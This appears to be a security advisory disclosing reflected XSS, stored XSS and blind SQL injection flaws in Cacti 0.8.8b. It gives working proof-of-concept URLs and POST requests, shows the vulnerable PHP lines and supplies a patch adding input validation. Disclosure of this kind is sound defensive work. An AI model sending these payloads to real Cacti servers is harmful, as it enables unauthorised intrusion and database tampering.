Multiple vulnerabilities in Cacti 0.8.8b and lower

Carreychen

The following are XSS and SQL Injection vulnerabilities I've found in the latest version of Cacti (0.8.8b), but are also in lower versions.

[ Reflected XSS ]

There is a reflected Cross Site Scripting vulnerability in the "step" parameter of the "/install/index.php" script.
http://<IP>/cacti/install/index.php?x=52&y=21&step=&quot;><script>alert(12345)</script> [^]


[ Stored XSS ]

The &quot;/cacti/host.php&quot; script is vulnerable to a stored Cross Site Scripting vulnerability in the &quot;id&quot; parameter.

Send the following POST request.

POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

id=<script>alert(12345)</script>&save_component_host=1&action=save

Now browse to http://<IP>/cacti/utilities.php?tail_lines=500&message_type=-1&go=Go&refresh=60&reverse=1&filter=12345&page=1&action=view_logfile [^]and you'll see a popup with the text &quot;12345&quot;.


[ Blind SQL Injection ]

The &quot;/cacti/host.php&quot; script is vulnerable to Blind SQL Injection in the &quot;id&quot; parameter. The proof of concept below will send a query to the backend MySQL which will calculate the MD5 hash for &quot;1&quot; 1000000 times and thus cause a delay before finishing the query.

POST /cacti/host.php HTTP/1.1
Host: <IP>
Cookie: Cacti=blahblahblah
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

id=-1 AND BENCHMARK(1000000,MD5(1))&save_component_host=1&action=save



The SQLi vulnerability is in the host.php which doesn't sanitize the $id parameter when providing it to the api_device_save() function in lib/api_device.php

host.php:

152: $host_id = api_device_save($_POST[&quot;id&quot;], $_POST[&quot;host_template_id&quot;], $_POST[&quot;description&quot;],

lib/api_device.php:

94: function api_device_save($id, $host_template_id, $description, $hostname, $snmp_community, $snmp_version,

[..SNIP..]

103: /* fetch some cache variables */
104: if (empty($id)) {
105: $_host_template_id = 0;
106: }else{
107: $_host_template_id = db_fetch_cell(&quot;select host_template_id from host where id=$id&quot;);
108: }


The changes below in &quot;host.php&quot; will fix this:

148: if ((isset($_POST[&quot;save_component_host&quot;])) && (empty($_POST[&quot;add_dq_x&quot;]))) {
149:&#43; /* ================= input validation ================= */
150:&#43; input_validate_input_number(get_request_var_post(&quot;id&quot;));
151:&#43; /* ==================================================== */
152: if ($_POST[&quot;snmp_version&quot;] == 3 && ($_POST[&quot;snmp_password&quot;] != $_POST[&quot;snmp_password_confirm&quot;])) {